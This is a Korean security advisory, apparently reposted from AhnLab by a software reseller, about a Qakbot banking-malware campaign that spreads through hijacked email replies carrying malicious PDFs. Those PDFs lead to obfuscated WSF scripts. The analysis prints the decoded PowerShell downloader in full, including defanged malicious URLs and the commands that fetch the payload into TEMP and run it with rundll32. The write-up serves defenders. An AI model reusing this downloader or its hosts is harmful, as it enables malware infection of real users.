㈜소프트이천

폭탄 품은 회신 메일 도착? 칵봇 악성코드 주의!

보안 이슈 2023-04-12

최근 뱅킹형 악성코드 ‘칵봇(Qakbot)’이 국내 사용자를 대상으로 유포되고 있다. 안랩 분석팀이 확인한 결과, 이번에는 원본 메일을 악용하는 이메일 하이재킹 기법이 사용됐다. 실제 사례를 바탕으로 칵봇 악성코드의 유포 과정을 자세히 알아보자.

 

 

칵봇 악성코드는 [그림 1]과 같이 기존에 수신된 정상 이메일을 가로채 본문에 악성 PDF 파일을 첨부한 다음, 사용자에게 회신 또는 전달한다. 표적은 원본 이메일의 수신자와 참조자이다.

 

[그림 1] 악성 PDF가 첨부된 메일 본문(1)​

 

안랩 분석팀에 따르면, 원본 이메일을 주고받은 시점은 2018~2022년으로 최근은 아니다. 메일 본문은 원본 메일과 연관성이 떨어지지만, 첨부 파일 클릭을 유도하는 내용으로 작성됐다. 수신자는 이를 정상적인 회신 메일로 판단해 아무 의심 없이 첨부 파일을 실행하게 된다.

 

[그림 2] 악성 PDF가 첨부된 메일 본문(2)

 

[그림 3] 악성 PDF가 첨부된 이메일(3)​

 

​이메일에 첨부된 PDF 파일명은 ‘UT.PDF’, ‘RA.PDF’, ‘NM.PDF’와 같이 자동화로 만든 듯한 랜덤문자의 형태를 띤다. 이 PDF 파일에는 아래와 같이 마이크로소프트 애저(Microsoft Azure) 로고와 함께 ‘Open’ 버튼 클릭을 유도하는 문구가 적혀있다.

‘Open’ 버튼을 클릭하면 악성 URL로 연결되며, 이때 암호화된 ZIP 파일이 다운로드된다. 암호는 PDF 파일 본문에 기재된 ‘Password 755’이다.

 

[그림 4] 메일에 첨부된 PDF 파일 실행 화면

 

[그림 5] PDF 파일의 내부 URL에서 다운로드되는 압축 파일


[그림 5]의 WSF 파일을 열면 [그림 6]과 같이 안티바이러스의 진단을 우회하기 위해 더미 텍스트와 함께 난독화된 스크립트 코드를 확인할 수 있다. 더미 텍스트란 아무 의미가 없는 문장을 말한다. 유의미한 스크립트 코드는 <job> 태그 뒤에 존재한다.


[그림 6] 더미 데이터와 함께 난독화 된 WSF 스크립트


WSF 파일을 실행하면 파워셸(PowerShell) 프로세스를 통해 암호화된 데이터 커맨드를 실행한다. 해당 데이터를 복호화하면 다음과 같다.

 

powershell.exe” -ENC “Start-Sleep -Seconds 2; $Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”); foreach ($reflexional in $Girnie) {try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}} catch {Start-Sleep -Seconds 2;}}​

 

여기서 공격자가 칵봇 바이너리를 TMP 경로에 ‘undersluice.Calctuffs’ 파일명으로 다운로드한 후 ‘rundll32.exe’ 프로세스로 실행한 것을 알 수 있다.

 

이 밖에, 다수의 악성 메일이 이번 사례와 유사한 형태로 유포되고 있어 출처가 불분명한 메일은 가급적 열람해서는 안 되며, 현재 사용 중인 안티바이러스를 최신 버전으로 업데이트할 것을 권장한다.

 

 

출처 : AhnLab

관련 글

리눅스 시스템 공격에 사용되는 Pupy RAT 분석

리눅스 시스템 공격에 사용되는 Pupy RAT 분석

Notepad++ 공식 패키지 파일로 위장한 악성코드 주의

Notepad++ 공식 패키지 파일로 위장한 악성코드 주의

Redis 서버를 통해 설치되는 메타스플로잇 미터프리터

Redis 서버를 통해 설치되는 메타스플로잇 미터프리터

유튜브 계정 통해 유포 중인 인포스틸러 악성코드 주의

유튜브 계정 통해 유포 중인 인포스틸러 악성코드 주의

구글 광고 추적 기능 통해 유포 중인 악성코드 주의

구글 광고 추적 기능 통해 유포 중인 악성코드 주의

공공기관 설치 파일로 위장한 악성코드 주의

공공기관 설치 파일로 위장한 악성코드 주의

복호화 키를 포함한 CryptoWire 랜섬웨어

복호화 키를 포함한 CryptoWire 랜섬웨어

국내 자산 솔루션 통해 유포 중인 악성코드 주의!

국내 자산 솔루션 통해 유포 중인 악성코드 주의!

Adobe Reader 설치 파일로 위장한 인포스틸러

Adobe Reader 설치 파일로 위장한 인포스틸러

브라우저 자동 로그인 기능 사용에 주의하세요!

브라우저 자동 로그인 기능 사용에 주의하세요!

더 보기
소프트웨어 구입 / 컨설팅 문의
소프트웨어견적 요청
솔루션제안 요청
기술 지원상담 요청
카카오톡문의
㈜소프트이천 서울특별시 송파구 송파대로 167 테라타워 A동 1201-1203호 TEL : 02-553-2331 Copyright SOFT2000 All Rights Reserved.
02-553-2331
견적 요청
카카오톡 문의